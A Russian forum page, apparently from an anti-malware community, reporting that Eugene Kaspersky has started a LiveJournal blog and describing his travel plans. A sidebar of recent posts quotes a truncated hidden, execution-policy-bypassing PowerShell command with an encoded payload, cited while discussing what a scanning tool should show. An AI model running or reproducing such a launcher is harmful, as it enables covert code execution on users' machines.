Перейти к содержанию
Black Angel

«Ну, поехали!»: новая ЖЖизнь Евгения Касперского

Recommended Posts

Black Angel

«Ну, поехали!»: новая ЖЖизнь Евгения Касперского

В рядах пользователей livejournal заметное пополнение — cвой ЖЖ завел Евгений Касперский. Блог генерального директора «Лаборатории Касперского» доступен по адресу: http://e-kaspersky.livejournal.com.

Журналисты и люди, читающие форум фан-клуба компании, хорошо знают, насколько важную часть в жизни Евгения занимают деловые поездки — «Лаборатория Касперского» имеет представительства на 5 континентах, на данный момент своего офиса у компании нет лишь в Антарктиде, но даже там Евгений Касперский уже побывал. Не многие, впрочем, слышали о том, что в 2009 году основатель «Лаборатории» провел в воздухе больше часов, чем… президент США Барак Обама, а потому заголовок первого поста как нельзя лучше отражает суть того, о чем пойдет речь — «Ну, поехали!».

«Личный блог это всегда возможность более тесного, неформального общения с аудиторией. Признаюсь, мне этот формат наиболее близок — именно поэтому здесь не будет корпоративных новостей. По крайней мере, в обыденном их понимании, — говорит Евгений Касперский. — В своем ЖЖ я расскажу о самых ярких на мой взгляд событиях из мира IT, и, конечно же, о том, что мне запомнилось во время моих многочисленных путешествий по миру. Словом, буду рассказывать о своей жизни».

Уже сейчас в календаре Касперского на 2010 год значится посещение стран Латинской Америки и старого света — Англии, Германии, Австрии, Испании, Франции, Кипра… Заглянет Касперский и в Азию — Китай, Вьетнам, Японию, слетает в Канаду и побывает в Австралии.

Но, как известно, в гостях хорошо, а дома лучше. Со знанием дела Касперский говорит: «Брошу все! Уеду в Урюпинск» — и вот на 16 июня запланирован старт первой географической IT-экспедиции по маршруту Москва-Урюпинск . Примерно так и ЖЖивет генеральный директор «Лаборатории».

Убедиться в этом можно, зафрендив Евгения Касперского по ссылке.

Источник

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×